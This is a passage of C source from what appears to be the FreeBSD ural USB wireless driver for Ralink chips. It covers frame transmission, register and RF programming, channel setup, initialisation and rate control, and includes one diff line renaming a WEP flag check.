STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return 0; } static int ural_sendprot(struct ural_softc *sc, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_frame *wh; struct ural_tx_data *data; struct mbuf *mprot; int protrate, ackrate, pktlen, flags, isshort; uint16_t dur; KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, const struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags = RAL_TX_RETRY(7); if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags |= RAL_TX_ACK; mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { /* XXX stat + msg */ return ENOBUFS; } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = mprot; data->ni = ieee80211_ref_node(ni); data->rate = protrate; ural_setup_tx_desc(sc, &data->desc, flags, mprot->m_pkthdr.len, protrate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return 0; } static int ural_tx_raw(struct ural_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ural_tx_data *data; uint32_t flags; int error; int rate; RAL_LOCK_ASSERT(sc, MA_OWNED); KASSERT(params != NULL, ("no raw xmit params")); rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { m_freem(m0); return EINVAL; } flags = 0; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) flags |= RAL_TX_ACK; if (params->ibp_flags & (IEEE80211_BPF_RTS|IEEE80211_BPF_CTS)) { error = ural_sendprot(sc, m0, ni, params->ibp_flags & IEEE80211_BPF_RTS ? IEEE80211_PROT_RTSCTS : IEEE80211_PROT_CTSONLY, rate); if (error || sc->tx_nfree == 0) { m_freem(m0); return ENOBUFS; } flags |= RAL_TX_IFS_SIFS; } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = m0; data->ni = ni; data->rate = rate; /* XXX need to setup descriptor ourself */ ural_setup_tx_desc(sc, &data->desc, flags, m0->m_pkthdr.len, rate); DPRINTFN(10, "sending raw frame len=%u rate=%u\n", m0->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return 0; } static int ural_tx_data(struct ural_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ural_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; uint32_t flags = 0; uint16_t dur; int error, rate; RAL_LOCK_ASSERT(sc, MA_OWNED); wh = mtod(m0, struct ieee80211_frame *); tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else rate = ni->ni_txrate; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { int prot = IEEE80211_PROT_NONE; if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) prot = IEEE80211_PROT_RTSCTS; else if ((ic->ic_flags & IEEE80211_F_USEPROT) && ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) prot = ic->ic_protmode; if (prot != IEEE80211_PROT_NONE) { error = ural_sendprot(sc, m0, ni, prot, rate); if (error || sc->tx_nfree == 0) { m_freem(m0); return ENOBUFS; } flags |= RAL_TX_IFS_SIFS; } } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = m0; data->ni = ni; data->rate = rate; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RAL_TX_ACK; flags |= RAL_TX_RETRY(7); dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); } ural_setup_tx_desc(sc, &data->desc, flags, m0->m_pkthdr.len, rate); DPRINTFN(10, "sending data frame len=%u rate=%u\n", m0->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return 0; } static void ural_start(struct ifnet *ifp) { struct ural_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; RAL_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { RAL_UNLOCK(sc); return; } for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if (sc->tx_nfree < RAL_TX_MINFREE) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (ural_tx_data(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } } RAL_UNLOCK(sc); } static int ural_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ural_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; RAL_LOCK(sc); error = sc->sc_detached ? ENXIO : 0; RAL_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: RAL_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { ural_init_locked(sc); startall = 1; } else ural_setpromisc(sc); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) ural_stop(sc); } RAL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: case SIOCSIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; default: error = ether_ioctl(ifp, cmd, data); break; } return error; } static void ural_set_testmode(struct ural_softc *sc) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RAL_VENDOR_REQUEST; USETW(req.wValue, 4); USETW(req.wIndex, 1); USETW(req.wLength, 0); error = ural_do_request(sc, &req, NULL); if (error != 0) { device_printf(sc->sc_dev, "could not set test mode: %s\n", usbd_errstr(error)); } } static void ural_eeprom_read(struct ural_softc *sc, uint16_t addr, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RAL_READ_EEPROM; USETW(req.wValue, 0); USETW(req.wIndex, addr); USETW(req.wLength, len); error = ural_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not read EEPROM: %s\n", usbd_errstr(error)); } } static uint16_t ural_read(struct ural_softc *sc, uint16_t reg) { struct usb_device_request req; usb_error_t error; uint16_t val; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RAL_READ_MAC; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, sizeof (uint16_t)); error = ural_do_request(sc, &req, &val); if (error != 0) { device_printf(sc->sc_dev, "could not read MAC register: %s\n", usbd_errstr(error)); return 0; } return le16toh(val); } static void ural_read_multi(struct ural_softc *sc, uint16_t reg, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RAL_READ_MULTI_MAC; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, len); error = ural_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not read MAC register: %s\n", usbd_errstr(error)); } } static void ural_write(struct ural_softc *sc, uint16_t reg, uint16_t val) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RAL_WRITE_MAC; USETW(req.wValue, val); USETW(req.wIndex, reg); USETW(req.wLength, 0); error = ural_do_request(sc, &req, NULL); if (error != 0) { device_printf(sc->sc_dev, "could not write MAC register: %s\n", usbd_errstr(error)); } } static void ural_write_multi(struct ural_softc *sc, uint16_t reg, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RAL_WRITE_MULTI_MAC; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, len); error = ural_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not write MAC register: %s\n", usbd_errstr(error)); } } static void ural_bbp_write(struct ural_softc *sc, uint8_t reg, uint8_t val) { uint16_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(ural_read(sc, RAL_PHY_CSR8) & RAL_BBP_BUSY)) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP\n"); return; } tmp = reg << 8 | val; ural_write(sc, RAL_PHY_CSR7, tmp); } static uint8_t ural_bbp_read(struct ural_softc *sc, uint8_t reg) { uint16_t val; int ntries; val = RAL_BBP_WRITE | reg << 8; ural_write(sc, RAL_PHY_CSR7, val); for (ntries = 0; ntries < 100; ntries++) { if (!(ural_read(sc, RAL_PHY_CSR8) & RAL_BBP_BUSY)) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not read BBP\n"); return 0; } return ural_read(sc, RAL_PHY_CSR7) & 0xff; } static void ural_rf_write(struct ural_softc *sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(ural_read(sc, RAL_PHY_CSR10) & RAL_RF_LOBUSY)) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RAL_RF_BUSY | RAL_RF_20BIT | (val & 0xfffff) << 2 | (reg & 0x3); ural_write(sc, RAL_PHY_CSR9, tmp & 0xffff); ural_write(sc, RAL_PHY_CSR10, tmp >> 16); /* remember last written value in sc */ sc->rf_regs[reg] = val; DPRINTFN(15, "RF R[%u] <- 0x%05x\n", reg & 0x3, val & 0xfffff); } static void ural_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct ural_softc *sc = ifp->if_softc; RAL_LOCK(sc); ural_write(sc, RAL_TXRX_CSR19, 0); ural_set_bssid(sc, ifp->if_broadcastaddr); RAL_UNLOCK(sc); } static void ural_scan_end(struct ieee80211com *ic) { struct ural_softc *sc = ic->ic_ifp->if_softc; RAL_LOCK(sc); ural_enable_tsf_sync(sc); ural_set_bssid(sc, sc->sc_bssid); RAL_UNLOCK(sc); } static void ural_set_channel(struct ieee80211com *ic) { struct ural_softc *sc = ic->ic_ifp->if_softc; RAL_LOCK(sc); ural_set_chan(sc, ic->ic_curchan); RAL_UNLOCK(sc); } static void ural_set_chan(struct ural_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint8_t power, tmp; int i, chan; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) return; if (IEEE80211_IS_CHAN_2GHZ(c)) power = min(sc->txpow[chan - 1], 31); else power = 31; /* adjust txpower using ifconfig settings */ power -= (100 - ic->ic_txpowlimit) / 8; DPRINTFN(2, "setting channel to %u, txpower to %u\n", chan, power); switch (sc->rf_rev) { case RAL_RF_2522: ural_rf_write(sc, RAL_RF1, 0x00814); ural_rf_write(sc, RAL_RF2, ural_rf2522_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x00040); break; case RAL_RF_2523: ural_rf_write(sc, RAL_RF1, 0x08804); ural_rf_write(sc, RAL_RF2, ural_rf2523_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x38044); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RAL_RF_2524: ural_rf_write(sc, RAL_RF1, 0x0c808); ural_rf_write(sc, RAL_RF2, ural_rf2524_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x00040); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RAL_RF_2525: ural_rf_write(sc, RAL_RF1, 0x08808); ural_rf_write(sc, RAL_RF2, ural_rf2525_hi_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x18044); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); ural_rf_write(sc, RAL_RF1, 0x08808); ural_rf_write(sc, RAL_RF2, ural_rf2525_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x18044); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RAL_RF_2525E: ural_rf_write(sc, RAL_RF1, 0x08808); ural_rf_write(sc, RAL_RF2, ural_rf2525e_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x18044); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00286 : 0x00282); break; case RAL_RF_2526: ural_rf_write(sc, RAL_RF2, ural_rf2526_hi_r2[chan - 1]); ural_rf_write(sc, RAL_RF4, (chan & 1) ? 0x00386 : 0x00381); ural_rf_write(sc, RAL_RF1, 0x08804); ural_rf_write(sc, RAL_RF2, ural_rf2526_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x18044); ural_rf_write(sc, RAL_RF4, (chan & 1) ? 0x00386 : 0x00381); break; /* dual-band RF */ case RAL_RF_5222: for (i = 0; ural_rf5222[i].chan != chan; i++); ural_rf_write(sc, RAL_RF1, ural_rf5222[i].r1); ural_rf_write(sc, RAL_RF2, ural_rf5222[i].r2); ural_rf_write(sc, RAL_RF3, power << 7 | 0x00040); ural_rf_write(sc, RAL_RF4, ural_rf5222[i].r4); break; } if (ic->ic_opmode != IEEE80211_M_MONITOR && (ic->ic_flags & IEEE80211_F_SCAN) == 0) { /* set Japan filter bit for channel 14 */ tmp = ural_bbp_read(sc, 70); tmp &= ~RAL_JAPAN_FILTER; if (chan == 14) tmp |= RAL_JAPAN_FILTER; ural_bbp_write(sc, 70, tmp); /* clear CRC errors */ ural_read(sc, RAL_STA_CSR0); ural_pause(sc, hz / 100); ural_disable_rf_tune(sc); } /* XXX doesn't belong here */ /* update basic rate set */ ural_set_basicrates(sc, c); /* give the hardware some time to do the switchover */ ural_pause(sc, hz / 100); } /* * Disable RF auto-tuning. */ static void ural_disable_rf_tune(struct ural_softc *sc) { uint32_t tmp; if (sc->rf_rev != RAL_RF_2523) { tmp = sc->rf_regs[RAL_RF1] & ~RAL_RF1_AUTOTUNE; ural_rf_write(sc, RAL_RF1, tmp); } tmp = sc->rf_regs[RAL_RF3] & ~RAL_RF3_AUTOTUNE; ural_rf_write(sc, RAL_RF3, tmp); DPRINTFN(2, "disabling RF autotune\n"); } /* * Refer to IEEE Std 802.11-1999 pp. 123 for more information on TSF * synchronization. */ static void ural_enable_tsf_sync(struct ural_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint16_t logcwmin, preload, tmp; /* first, disable TSF synchronization */ ural_write(sc, RAL_TXRX_CSR19, 0); tmp = (16 * vap->iv_bss->ni_intval) << 4; ural_write(sc, RAL_TXRX_CSR18, tmp); logcwmin = (ic->ic_opmode == IEEE80211_M_IBSS) ? 2 : 0; preload = (ic->ic_opmode == IEEE80211_M_IBSS) ? 320 : 6; tmp = logcwmin << 12 | preload; ural_write(sc, RAL_TXRX_CSR20, tmp); /* finally, enable TSF synchronization */ tmp = RAL_ENABLE_TSF | RAL_ENABLE_TBCN; if (ic->ic_opmode == IEEE80211_M_STA) tmp |= RAL_ENABLE_TSF_SYNC(1); else tmp |= RAL_ENABLE_TSF_SYNC(2) | RAL_ENABLE_BEACON_GENERATOR; ural_write(sc, RAL_TXRX_CSR19, tmp); DPRINTF("enabling TSF synchronization\n"); } static void ural_enable_tsf(struct ural_softc *sc) { /* first, disable TSF synchronization */ ural_write(sc, RAL_TXRX_CSR19, 0); ural_write(sc, RAL_TXRX_CSR19, RAL_ENABLE_TSF | RAL_ENABLE_TSF_SYNC(2)); } #define RAL_RXTX_TURNAROUND 5 /* us */ static void ural_update_slot(struct ifnet *ifp) { struct ural_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint16_t slottime, sifs, eifs; slottime = (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20; /* * These settings may sound a bit inconsistent but this is what the * reference driver does. */ if (ic->ic_curmode == IEEE80211_MODE_11B) { sifs = 16 - RAL_RXTX_TURNAROUND; eifs = 364; } else { sifs = 10 - RAL_RXTX_TURNAROUND; eifs = 64; } ural_write(sc, RAL_MAC_CSR10, slottime); ural_write(sc, RAL_MAC_CSR11, sifs); ural_write(sc, RAL_MAC_CSR12, eifs); } static void ural_set_txpreamble(struct ural_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t tmp; tmp = ural_read(sc, RAL_TXRX_CSR10); tmp &= ~RAL_SHORT_PREAMBLE; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RAL_SHORT_PREAMBLE; ural_write(sc, RAL_TXRX_CSR10, tmp); } static void ural_set_basicrates(struct ural_softc *sc, const struct ieee80211_channel *c) { /* XXX wrong, take from rate set */ /* update basic rate set */ if (IEEE80211_IS_CHAN_5GHZ(c)) { /* 11a basic rates: 6, 12, 24Mbps */ ural_write(sc, RAL_TXRX_CSR11, 0x150); } else if (IEEE80211_IS_CHAN_ANYG(c)) { /* 11g basic rates: 1, 2, 5.5, 11, 6, 12, 24Mbps */ ural_write(sc, RAL_TXRX_CSR11, 0x15f); } else { /* 11b basic rates: 1, 2Mbps */ ural_write(sc, RAL_TXRX_CSR11, 0x3); } } static void ural_set_bssid(struct ural_softc *sc, const uint8_t *bssid) { uint16_t tmp; tmp = bssid[0] | bssid[1] << 8; ural_write(sc, RAL_MAC_CSR5, tmp); tmp = bssid[2] | bssid[3] << 8; ural_write(sc, RAL_MAC_CSR6, tmp); tmp = bssid[4] | bssid[5] << 8; ural_write(sc, RAL_MAC_CSR7, tmp); DPRINTF("setting BSSID to %6D\n", bssid, ":"); } static void ural_set_macaddr(struct ural_softc *sc, uint8_t *addr) { uint16_t tmp; tmp = addr[0] | addr[1] << 8; ural_write(sc, RAL_MAC_CSR2, tmp); tmp = addr[2] | addr[3] << 8; ural_write(sc, RAL_MAC_CSR3, tmp); tmp = addr[4] | addr[5] << 8; ural_write(sc, RAL_MAC_CSR4, tmp); DPRINTF("setting MAC address to %6D\n", addr, ":"); } static void ural_setpromisc(struct ural_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; tmp = ural_read(sc, RAL_TXRX_CSR2); tmp &= ~RAL_DROP_NOT_TO_ME; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RAL_DROP_NOT_TO_ME; ural_write(sc, RAL_TXRX_CSR2, tmp); DPRINTF("%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ? "entering" : "leaving"); } static void ural_update_promisc(struct ifnet *ifp) { struct ural_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; RAL_LOCK(sc); ural_setpromisc(sc); RAL_UNLOCK(sc); } static const char * ural_get_rf(int rev) { switch (rev) { case RAL_RF_2522: return "RT2522"; case RAL_RF_2523: return "RT2523"; case RAL_RF_2524: return "RT2524"; case RAL_RF_2525: return "RT2525"; case RAL_RF_2525E: return "RT2525e"; case RAL_RF_2526: return "RT2526"; case RAL_RF_5222: return "RT5222"; default: return "unknown"; } } static void ural_read_eeprom(struct ural_softc *sc) { uint16_t val; ural_eeprom_read(sc, RAL_EEPROM_CONFIG0, &val, 2); val = le16toh(val); sc->rf_rev = (val >> 11) & 0x7; sc->hw_radio = (val >> 10) & 0x1; sc->led_mode = (val >> 6) & 0x7; sc->rx_ant = (val >> 4) & 0x3; sc->tx_ant = (val >> 2) & 0x3; sc->nb_ant = val & 0x3; /* read MAC address */ ural_eeprom_read(sc, RAL_EEPROM_ADDRESS, sc->sc_bssid, 6); /* read default values for BBP registers */ ural_eeprom_read(sc, RAL_EEPROM_BBP_BASE, sc->bbp_prom, 2 * 16); /* read Tx power for all b/g channels */ ural_eeprom_read(sc, RAL_EEPROM_TXPOWER, sc->txpow, 14); } static int ural_bbp_init(struct ural_softc *sc) { #define N(a) ((int)(sizeof (a) / sizeof ((a)[0]))) int i, ntries; /* wait for BBP to be ready */ for (ntries = 0; ntries < 100; ntries++) { if (ural_bbp_read(sc, RAL_BBP_VERSION) != 0) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP\n"); return EIO; } /* initialize BBP registers to default values */ for (i = 0; i < N(ural_def_bbp); i++) ural_bbp_write(sc, ural_def_bbp[i].reg, ural_def_bbp[i].val); #if 0 /* initialize BBP registers to values stored in EEPROM */ for (i = 0; i < 16; i++) { if (sc->bbp_prom[i].reg == 0xff) continue; ural_bbp_write(sc, sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } #endif return 0; #undef N } static void ural_set_txantenna(struct ural_softc *sc, int antenna) { uint16_t tmp; uint8_t tx; tx = ural_bbp_read(sc, RAL_BBP_TX) & ~RAL_BBP_ANTMASK; if (antenna == 1) tx |= RAL_BBP_ANTA; else if (antenna == 2) tx |= RAL_BBP_ANTB; else tx |= RAL_BBP_DIVERSITY; /* need to force I/Q flip for RF 2525e, 2526 and 5222 */ if (sc->rf_rev == RAL_RF_2525E || sc->rf_rev == RAL_RF_2526 || sc->rf_rev == RAL_RF_5222) tx |= RAL_BBP_FLIPIQ; ural_bbp_write(sc, RAL_BBP_TX, tx); /* update values in PHY_CSR5 and PHY_CSR6 */ tmp = ural_read(sc, RAL_PHY_CSR5) & ~0x7; ural_write(sc, RAL_PHY_CSR5, tmp | (tx & 0x7)); tmp = ural_read(sc, RAL_PHY_CSR6) & ~0x7; ural_write(sc, RAL_PHY_CSR6, tmp | (tx & 0x7)); } static void ural_set_rxantenna(struct ural_softc *sc, int antenna) { uint8_t rx; rx = ural_bbp_read(sc, RAL_BBP_RX) & ~RAL_BBP_ANTMASK; if (antenna == 1) rx |= RAL_BBP_ANTA; else if (antenna == 2) rx |= RAL_BBP_ANTB; else rx |= RAL_BBP_DIVERSITY; /* need to force no I/Q flip for RF 2525e and 2526 */ if (sc->rf_rev == RAL_RF_2525E || sc->rf_rev == RAL_RF_2526) rx &= ~RAL_BBP_FLIPIQ; ural_bbp_write(sc, RAL_BBP_RX, rx); } static void ural_init_locked(struct ural_softc *sc) { #define N(a) ((int)(sizeof (a) / sizeof ((a)[0]))) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t tmp; int i, ntries; RAL_LOCK_ASSERT(sc, MA_OWNED); ural_set_testmode(sc); ural_write(sc, 0x308, 0x00f0); /* XXX magic */ ural_stop(sc); /* initialize MAC registers to default values */ for (i = 0; i < N(ural_def_mac); i++) ural_write(sc, ural_def_mac[i].reg, ural_def_mac[i].val); /* wait for BBP and RF to wake up (this can take a long time!) */ for (ntries = 0; ntries < 100; ntries++) { tmp = ural_read(sc, RAL_MAC_CSR17); if ((tmp & (RAL_BBP_AWAKE | RAL_RF_AWAKE)) == (RAL_BBP_AWAKE | RAL_RF_AWAKE)) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP/RF to wakeup\n"); goto fail; } /* we're ready! */ ural_write(sc, RAL_MAC_CSR1, RAL_HOST_READY); /* set basic rate set (will be updated later) */ ural_write(sc, RAL_TXRX_CSR11, 0x15f); if (ural_bbp_init(sc) != 0) goto fail; ural_set_chan(sc, ic->ic_curchan); /* clear statistic registers (STA_CSR0 to STA_CSR10) */ ural_read_multi(sc, RAL_STA_CSR0, sc->sta, sizeof sc->sta); ural_set_txantenna(sc, sc->tx_ant); ural_set_rxantenna(sc, sc->rx_ant); ural_set_macaddr(sc, IF_LLADDR(ifp)); /* * Allocate Tx and Rx xfer queues. */ ural_setup_tx_list(sc); /* kick Rx */ tmp = RAL_DROP_PHY | RAL_DROP_CRC; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RAL_DROP_CTL | RAL_DROP_BAD_VERSION; if (ic->ic_opmode != IEEE80211_M_HOSTAP) tmp |= RAL_DROP_TODS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RAL_DROP_NOT_TO_ME; } ural_write(sc, RAL_TXRX_CSR2, tmp); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; usbd_xfer_set_stall(sc->sc_xfer[URAL_BULK_WR]); usbd_transfer_start(sc->sc_xfer[URAL_BULK_RD]); return; fail: ural_stop(sc); #undef N } static void ural_init(void *priv) { struct ural_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); ural_init_locked(sc); RAL_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void ural_stop(struct ural_softc *sc) { struct ifnet *ifp = sc->sc_ifp; RAL_LOCK_ASSERT(sc, MA_OWNED); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* * Drain all the transfers, if not already drained: */ RAL_UNLOCK(sc); usbd_transfer_drain(sc->sc_xfer[URAL_BULK_WR]); usbd_transfer_drain(sc->sc_xfer[URAL_BULK_RD]); RAL_LOCK(sc); ural_unsetup_tx_list(sc); /* disable Rx */ ural_write(sc, RAL_TXRX_CSR2, RAL_DISABLE_RX); /* reset ASIC and BBP (but won't reset MAC registers!) */ ural_write(sc, RAL_MAC_CSR1, RAL_RESET_ASIC | RAL_RESET_BBP); /* wait a little */ ural_pause(sc, hz / 10); ural_write(sc, RAL_MAC_CSR1, 0); /* wait a little */ ural_pause(sc, hz / 10); } static int ural_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct ural_softc *sc = ifp->if_softc; RAL_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (sc->tx_nfree < RAL_TX_MINFREE) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return EIO; } ifp->if_opackets++; if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ if (ural_tx_mgt(sc, m, ni) != 0) goto bad; } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ if (ural_tx_raw(sc, m, ni, params) != 0) goto bad; } RAL_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; RAL_UNLOCK(sc); ieee80211_free_node(ni); return EIO; /* XXX */ } static void ural_ratectl_start(struct ural_softc *sc, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ural_vap *uvp = URAL_VAP(vap); /* clear statistic registers (STA_CSR0 to STA_CSR10) */ ural_read_multi(sc, RAL_STA_CSR0, sc->sta, sizeof sc->sta); usb_callout_reset(&uvp->ratectl_ch, hz, ural_ratectl_timeout, uvp); } static void ural_ratectl_timeout(void *arg) { struct ural_vap *uvp = arg; struct ieee80211vap *vap = &uvp->vap; struct ieee80211com *ic = vap->iv_ic; ieee80211_runtask(ic, &uvp->ratectl_task); } static void ural_ratectl_task(void *arg, int pending) { struct ural_vap *uvp = arg; struct ieee80211vap *vap = &uvp->vap; struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct ural_softc *sc = ifp->if_softc; struct ieee80211_node *ni; int ok, fail; int sum, retrycnt; ni = ieee80211_ref_node(vap->iv_bss); RAL_LOCK(sc); /* read and clear statistic registers (STA_CSR0 to STA_CSR10) */ ural_read_multi(sc, RAL_STA_CSR0, sc->sta, sizeof(sc->sta)); ok = sc->sta[7] + /* TX ok w/o retry */ sc->sta[8]; /* TX ok w/ retry */ fail = sc->sta[9]; /* TX retry-fail count */ sum = ok+fail; retrycnt = sc->sta[8] + fail; ieee80211_ratectl_tx_update(vap, ni, &sum, 